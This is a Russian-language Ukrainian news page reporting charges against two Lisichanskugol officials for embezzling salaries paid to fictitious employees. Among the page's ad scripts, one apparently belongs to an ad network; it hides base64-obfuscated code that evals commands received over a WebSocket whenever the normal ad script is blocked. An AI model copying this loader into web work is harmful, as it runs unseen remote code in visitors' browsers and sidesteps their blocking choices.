<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении двух должностных лиц одного из подразделений ОАО «Лисичанскуголь». Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении">
<meta name="keywords" content="обвинительный, области, Луганской, Прокуратурой, «Лисичанскуголь», подразделений, должностных, одного, отношении, направлен, расследование, досудебное, завершено, путем, совершенный, подлог, служебный, положением, служебным, злоупотребления">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату">
<meta property="og:url" content="http://www.citynews.net.ua/news/83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-04/thumbs/1585818772_15003542383.jpg">
<meta property="og:description" content="Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении двух должностных лиц одного из подразделений ОАО «Лисичанскуголь». По данным следствия, в течение 2017-2019 годов указанные лица с целью завладения бюджетными средствами фиктивно">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату</h1>
<a href="http://www.citynews.net.ua/2020/04/02/" ><span class="date">Сегодня, 12:12</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html" data-title="В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2020-04/thumbs/1585818772_15003542383.jpg" alt="" style="float:left;">Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении двух должностных лиц одного из подразделений ОАО «Лисичанскуголь».</p>
<p>По данным следствия, в течение 2017-2019 годов указанные лица с целью завладения бюджетными средствами фиктивно трудоустроили на предприятие двух граждан. Подозреваемые внесли в официальные документы ложные сведения о пребывании лиц на рабочем месте и выполнении работ, таким образом искусственно создав условия для начисления заработной платы, которую в дальнейшем присвоили. Преступными действиями служащих угледобывающего предприятия нанесен ущерб государству на сумму около 200 тыс. гривень.</p>
<p>Сейчас обвинительный акт по ч. 3 ст. 191 (завладение чужим имуществом путем злоупотребления служебным положением), ч. 2 ст. 28 ч. 1 ст. 366 (служебный подлог, совершенный по предварительному сговору группой лиц) УК Украины направлено в Лисичанский городской суда Луганской области для рассмотрения по существу.</p>
<p>Обвиняемым грозит до 8 лет лишения свободы с лишением права занимать определенные должности или заниматься определенной деятельностью сроком до 3 лет</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/78096-na-luganschine-za-rastratu-byudzheta-budut-sudit-glavu-poselkovogo-soveta.html">На Луганщине за растрату бюджета будут судить главу поселкового совета</a></li><li><a href="http://www.citynews.net.ua/news/66944-na-luganschine-za-rastratu-byudzhetnyh-sredstv-budut-sudit-predprinimatelya-i-prorektora-universiteta.html">На Луганщине за растрату бюджетных средств будут судить предпринимателя и проректора университета</a></li><li><a href="http://www.citynews.net.ua/news/63999-chinovnica-markovskoy-rayadministracii-tri-goda-vorovala-dengi-v-sgovore-s-podchinennymi.html">Чиновница Марковской райадминистрации три года воровала деньги в сговоре с подчиненными</a></li><li><a href="http://www.citynews.net.ua/ukrainenews/60575-eks-rukovoditelya-konstantinovskogo-himzavoda-i-ego-soobschnika-obyavili-v-rozysk-za-rastratu.html">Экс-руководителя Константиновского химзавода и его сообщника объявили в розыск за растрату</a></li><li><a href="http://www.citynews.net.ua/news/5938-v-luganskoj-oblasti-chinovniki-v-bolnice-ukrali-1-million-600-tysyach-griven.html">В Луганской области чиновники в больнице украли 1 миллион 600 тысяч гривень</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 12:12</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html">В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату</a></h4><span>Сегодня, 11:14</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83388-v-ukraine-podtverzhdeno-804-sluchaja-covid-19.html">В Украине подтверждено 804 случая COVID-19</a></h4><span>Сегодня, 11:10</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83387-rossijskie-terroristy-2-chasa-obstrelivali-luganskuju-oblast-iz-artillerii-i-minometov.html">Российские террористы 2 часа обстреливали Луганскую область из артиллерии и минометов</a></h4><span>Вчера, 17:33</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83386-v-ukraine-hotjat-uzhestochit-karantin-zapret-vyhodit-bez-masok-bolshe-dvuh-i-detjam-bez-soprovozhdenija.html">В Украине хотят ужесточить карантин: запрет выходить без масок, больше двух и детям без сопровождения</a></h4><span>Вчера, 15:59</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83385-sbu-zajavila-o-poimke-bezhenca-agenta-fsb-pri-popytke-zaverbovatsja-na-voennuju-sluzhbu.html">СБУ заявила о поимке беженца-агента ФСБ при попытке завербоваться на военную службу</a></h4><span>Вчера, 14:38</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83383-kabmin-podderzhal-ideju-vyplatit-pensioneram-po-1000-griven-i-proindeksirovat-pensii.html">Кабмин поддержал идею выплатить пенсионерам по 1000 гривень и проиндексировать пенсии</a></h4><span>Вчера, 13:15</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83381-v-severodonecke-vozobnovleno-dvizhenie-passazhirskogo-transporta.html">В Северодонецке возобновлено движение пассажирского транспорта</a></h4><span>Вчера, 11:22</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83380-v-luganskoj-oblasti-podtverzhden-3-sluchaj-covid-19-zabolevshaja-zhenschina-imela-41-kontakt.html">В Луганской области подтвержден 3 случай COVID-19 - заболевшая женщина имела 41 контакт</a></h4><span>Вчера, 10:42</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83379-obstrely-v-oos-31-marta-pogib-ukrainskij-soldat-esche-troe-raneny.html">Обстрелы в ООС: 31 марта погиб украинский солдат, еще трое - ранены</a></h4><span>Вчера, 10:34</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83378-situacija-na-kpvv-terroristy-ne-propuskajut-ni-grazhdan-ni-obse-v-okkupirovannye-rajony-luganska-i-donecka.html">Ситуация на КПВВ: Террористы не пропускают граждан и ОБСЕ в оккупированные районы Луганска и Донецка</a></h4><span>31-03-2020, 20:48</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83377-v-luganske-i-severodonecke-ozhidaetsja-rezkoe-uhudshenie-pogody.html">В Луганске и Северодонецке ожидается резкое ухудшение погоды</a></h4><span>31-03-2020, 16:36</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/83375-v-stanice-luganskoj-rossijskie-terroristy-ne-propuskajut-na-okkupirovannuju-territoriju-26-chelovek.html">В Станице Луганской российские террористы не пропускают на оккупированную территорию 26 человек</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Вчера, 15:54</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83384-v-lucke-u-chetyreh-medikov-diagnostirovali-koronavirus.html">В Луцке у четырех медиков диагностировали коронавирус</a></h4><span>Вчера, 13:50</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83382-v-odesse-jevakuirovannyh-paromom-iz-gruzii-ukraincev-otpravili-na-karantin.html">В Одессе эвакуированных паромом из Грузии украинцев отправили на карантин</a></h4><span>31-03-2020, 13:28</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83372-v-kieve-za-pikniki-vo-vremja-karantina-budut-shtrafovat-na-tysjachi-griven.html">В Киеве за пикники во время карантина будут штрафовать на тысячи гривень</a></h4><span>30-03-2020, 13:25</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83349-kak-rabotajut-perevodchiki-na-udalenke-v-ukraine.html">Как работают переводчики на удаленке в Украине</a></h4><span>27-03-2020, 15:24</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83334-v-vinnice-5-sotrudnic-roddoma-zaboleli-koronavirusom-covid-19.html">В Виннице 5 сотрудниц  роддома заболели коронавирусом COVID-19</a></h4><span>27-03-2020, 10:54</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83328-v-odesskoj-oblasti-prokurora-zaderzhali-pri-poluchenii-25-tys-dollarov-vzjatki.html">В Одесской области прокурора задержали при получении 25 тыс долларов взятки</a></h4><span>26-03-2020, 11:45</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83325-na-trasse-kiev-odessa-v-dtp-pogibli-2-cheloveka-i-esche-4-postradali.html">На трассе Киев-Одесса в ДТП погибли 2 человека и еще 4 - пострадали</a></h4><span>24-03-2020, 10:01</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83207-top-5-novostroek-odessy-nedaleko-ot-chernogo-morja.html">ТОП-5 новостроек Одессы недалеко от Черного моря</a></h4><span>23-03-2020, 13:44</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83292-6000-ukrainskih-medikov-besplatno-poluchili-ot-lifecell-po-1500-minut-i-20-gb-mobilnogo-trafika.html">6000 украинских медиков бесплатно получили от lifecell по 1500 минут и 20 ГБ  мобильного трафика</a></h4><span>20-03-2020, 11:55</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83281-s-pogonej-i-strelboj-v-odesse-zaderzhali-mezhdunarodnuju-bandu-grabitelej-bankov.html">С погоней и стрельбой: В Одессе задержали международную банду грабителей банков</a></h4><span>19-03-2020, 15:31</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83275-v-nikolaeve-zaderzhali-rossijskogo-shpiona.html">В Николаеве задержали российского шпиона</a></h4><span>19-03-2020, 12:37</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/83272-vselenskij-patriarh-varfolomej-zapretil-provodit-sluzhby-i-obrjady-pandemii-koronavirusa.html">Вселенский патриарх Варфоломей запретил проводить службы и обряды пандемии коронавируса</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('03','2020','right'); return false;" href="https://www.citynews.net.ua/2020/03/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Апрель 2020&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="2">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="https://www.citynews.net.ua/2020/04/01/" title="Все публикации за 01 апреля 2020">1</a></td><td  class="day-active-v day-current" ><a class="day-active-v" href="https://www.citynews.net.ua/2020/04/02/" title="Все публикации за 02 апреля 2020">2</a></td><td  class="day" >3</td><td  class="weekday" >4</td><td  class="weekday" >5</td></tr><tr><td  class="day" >6</td><td  class="day" >7</td><td  class="day" >8</td><td  class="day" >9</td><td  class="day" >10</td><td  class="weekday" >11</td><td  class="weekday" >12</td></tr><tr><td  class="day" >13</td><td  class="day" >14</td><td  class="day" >15</td><td  class="day" >16</td><td  class="day" >17</td><td  class="weekday" >18</td><td  class="weekday" >19</td></tr><tr><td  class="day" >20</td><td  class="day" >21</td><td  class="day" >22</td><td  class="day" >23</td><td  class="day" >24</td><td  class="weekday" >25</td><td  class="weekday" >26</td></tr><tr><td  class="day" >27</td><td  class="day" >28</td><td  class="day" >29</td><td  class="day" >30</td><td colspan="3">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении двух должностных лиц одного из подразделений ОАО «Лисичанскуголь». Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении">
<meta name="keywords" content="обвинительный, области, Луганской, Прокуратурой, «Лисичанскуголь», подразделений, должностных, одного, отношении, направлен, расследование, досудебное, завершено, путем, совершенный, подлог, служебный, положением, служебным, злоупотребления">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="В Луганской области будут судить чиновников ОАО «Лисичанскуголь» за растрату">
<meta property="og:url" content="http://www.citynews.net.ua/news/83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-04/thumbs/1585818772_15003542383.jpg">
<meta property="og:description" content="Прокуратурой в Луганской области завершено досудебное расследование и направлен в суд обвинительный акт в отношении двух должностных лиц одного из подразделений ОАО «Лисичанскуголь». По данным следствия, в течение 2017-2019 годов указанные лица с целью завладения бюджетными средствами фиктивно">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83389-v-luganskoj-oblasti-budut-sudit-chinovnikov-oao-lisichanskugol-za-rastratu.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
<script>
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = 'd5acbb30b3f3e4eafad0bc3dcca6741c053ac0ec';
var dle_group      = 5;
var dle_skin       = 'v2';
var dle_wysiwyg    = '2';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
